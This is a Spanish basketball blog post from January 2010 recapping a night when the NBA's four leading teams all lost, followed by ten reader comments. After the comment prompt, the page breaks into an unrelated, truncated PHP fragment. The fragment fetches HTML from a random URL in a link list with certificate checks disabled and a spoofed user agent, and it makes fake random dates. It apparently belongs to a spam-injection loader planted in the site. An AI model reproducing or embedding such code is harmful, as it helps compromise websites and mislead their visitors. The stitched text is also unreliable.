Minicrónica (08/01/2010)

09 de January de 2010 por txusma

Debe ser un hecho casi histórico que un mismo día pierdan los 4 mejores equipos de la competición. Orlando se dejó sorprender por unos Wizards que juegan sin Arenas desde su suspensión. Cierto que Vince Carter cayó lesionado en el segundo cuarto y no pudo volver al parqué pero el 6 de 24 que se marcaron entre Nelson y Lewis no es de recibo. En Atlanta, Jamal Crawford apuntilló a los Celtics desde la línea de 3 en el úñtimo cuarto y Denver completó la debacle del Este ganando a los Cavs, y eso que jugaban sin Carmelo Anthony. Para no ser menos,  los Lakers también se dejaron parte del crédito en Portland donde Brandon Roy les machacó sin piedad. Kobe Bryant intentó 37 lanzamientos de los que sólo anotó 14. Se nota, y mucho, la baja de Pau Gasol.

En el Oeste toman posiciones aparte de los Nuggets, los Mavs que vencieron en el derby tejano a los Spurs. Los de Nowitzki son segundos de la conferencia y adelantan a los Magic en la general. Se descuelga un tanto Phoenix que perdió frente al casi triple doble de Dwyane Wade.

En el resto de partidos de la jornada, Toronto le ganó a Philadelphia con Calderón saliendo desde el banco y con Chris Bosh decisivo y reivindicándose de cara al All-Stars; Minnesota se impuso a los Pacers de la mano de la dupla Jefferson-Love; Memphis agravó al crisis de los Jazz con un Zach Randolp mayúsculo, como toda la temporada; New Orleans sufrió de lo lindo ante los Nets y necesitó del mejor David West para imponerse; Andrew Bogut ejerció de líder en la victoria de los Bucks ante los Bulls; y finalmente, los Warriors, con Monta Ellis como estilete principal, consiguieron el triunfo frente los Kings.

Comenta

10 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Estuve viendo la primera parte de Lakers@Portland… aunque ya me temía lo peor, lo que ví me dejó un sabor de boca todavía más malo.
    El centro de mis preocupaciones es Andrew Bynum. No sé si será lo de las rodillas o que… pero es que su movilidad es un problema. Parece tal cual un elefante en una cacharrería… y por eso hace tantas faltas inútiles (además del concierto de pitos que había anoche a favor de unos exclusivamente, que esa es otra)
    Me parece un jugador mediocre. Dudo mucho que tenga la proyección que se esperaba.
    Además Artest está horripilante… resultado una defensa patética.
    Para colmo ellos las metían hasta sin querer.

    Por suerte menuda nochecita para todos los grandes…

      Citar

  2. HeiNeKeN dice:
    #2

    Roy las metio de todos los colores, impresionantes sus porcentajes, creo que fallo solo dos tiros de campo y un libre. Y Webster se crecio en los dos ultimos cuartos y tambien metio algun canaston que otro…

      Citar

  3. Love Denise dice:
    #3

    los 4 favoritos están en un momento de forma horrible, especialmente Orlando con 4 derrotas seguidas ante equipos medianos como Chicago, Indiana, Toronto y Washington. Creo que a V.Gundy se le ha ido el equipo de las manos, y sus decisiones son contradictorias, unos días Bass no juega y Anderson tiene 20 min para lanzarse 8 triples, y al siguiente Anderson se queda sin jugar y Bass le adelanta en la rotación. parece que quiere tener a todos contentos, y al final no tiene a ninguno. Ojo, a los deplorables estados de forma de Lewis y Carter.

    coincido con Deer en que Bynum no está fino, yo le veo muy blando, creo que su abuela en tanga intimidaría en la pintura más que él. Me parece vergonzoso que los Blazers sin sus 2 centers y con medio equipo lesionado agarren más rebotes que los angelinos. Yo no ví mal a Artest, a mi el que me desespera con su pasotismo es Odom. Alguien vio la cara de poker que se le quedó a Phil después de una inutil falta cometida por “La Máquina” Vujacic ?, jajaja que bueno.
    Kobe estuvo muy chupón y fallón aunque era el unico que hacía algo en ataque, y Fisher no defiende, creo que estaría bien el poner a Brown de base titular puesto que el estilo de juego angelino, no precisa de un base puro tipo Paul o Nash, sino que con un tío que defienda, tenga tiro exterior y aproveche los huecos dejados por los cracks, es suficiente, y pienso que Brown lo podría hacer mejor que Fisher.

    buen tapón el de Marc para sellar la victoria de Memphis, y enorme Crawford en atlanta.

      Citar

  4. sergio dice:
    #4

    De entrada estoy absolutamente de acuerdo con Denise, la abuela de Bynum en tanga debe intimidar mas, ya sea hablando de basket, como de portero de discoteca o en una pelea de K1.

    Creo que Jackson ya esta introduciendo camufladamente a Brown en el quinteto titular. Practicamente juega los mismos minutos si no mas. No porque no sea titular no es el base que aporta mas al equipo.. algo asi como Ginobili en los Spurs. Ademas, el no salir titular se ayuda a seguir trabajando y no dormirte (supongamos que lo de Fisher son años y no quedarse dormido). Tampoco seamos catastrofistas con las derrotas de los equipos de arriba exceptuando a los Magic que si tienen peor pinta. Supongo que todo se acabara arreglando: las rodillas de Bynum le daran confianza (espero q no se lesione otra vez), Artest se motivara para Playoffs, Odom sabra adaptarse al rol, Garnett volvera y los Celtics seran los de antes,…. lo que no entiendo realmente es porque siguen Hickson y O’neal jugando mas que Varejao e Ilgauskas. Estos ultimos estan infinitamente mas acostumbrados al sistema LeBroniano que el resto, solo hay que observar la estadistica ‘+/-‘ en cada partido… O’neal es un cancer!!

      Citar

  5. Fran Reyes dice:
    #5

    Como comenta Love_Denise, me parece digno de reseñar el tapón decisivo de Marc Gasol en la victoria de Memphis sobre Utah. No fue el único que hizo en el partido, de hecho puso cuatro más; pero si es cierto que fue el que selló el partido. En eso consiste el sato de calidad, en dejar de ser bueno y convertirse en clave.
    A todo esto, los Grizzlies van a más… Los veo en segunda ronda de play-offs…

      Citar

  6. Love Denise dice:
    #6

    quizas 2º ronda sea demasiado no? y más aun en el oeste, pero si tienen pinta de PO y de dar algun susto a algún favorito. Por cierto, creo que estamos viendo el mejor Randolph desde que llegó a la liga, tanto en juego como en comportamiento.

      Citar

  7. Txusma dice:
    #7

    Bueno, quintando a los Lakers veo bastante igualdad en el resto de equipos del Oeste así que no me extrañaría que Memphis se cargara a un Dallas, un Denver o unos Suns. Aunque claro, hablamos de eliminatorias a 7 partidos…
    Que diran en Memphis de Pau Gasol si su hermano sí que consigue ganar un partido de Playoffs?

      Citar

  8. SeRgio dice:
    #8

    Yo creo que lo que necistan los celtics es un alero que haga de sexto hombre y cumpla siempre,prince,nocioni,gomes o battier serían idoneos para boston,y ganarían bastante.

      Citar

  9. Toni dice:
    #9

    Si se cumpliera lo que dice SeRgio, probablemente los C’s pasarían a ser el mejor equipo de la competición.

    A mi parecer, quien más se beneficia de las recientes devacles de los líderes provocadas por su bajo estado de forma es claramente Atlanta, es el momento que suba ese escalón con el que lleva tropezando desde la temporada pasada y de ganar a Orlando esta madrugada, lo adelantaría.

    Estoy de acuerdo con lo de que O’neal a pesar de los buenos números que realiza, frena a LeBron, la pareja Ilgauskas-Varejao está infinitamente más acoplada al sistema.

    Brown le irá comiendo la tostada a Fisher hasta Playoff cuando volverá a jugar los momentos decisivos.

      Citar

  10. Viva_Dirk dice:
    #10

    No se lo que diran en Memphis Txus, pero lo que pasa es tan simple como que Marc tiene un equipo muchísimo mejor de cualquiera de los que tuvo Pau.

    Esa plantilla sin problemas de disciplina de Zach es una plantilla de play-offs.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>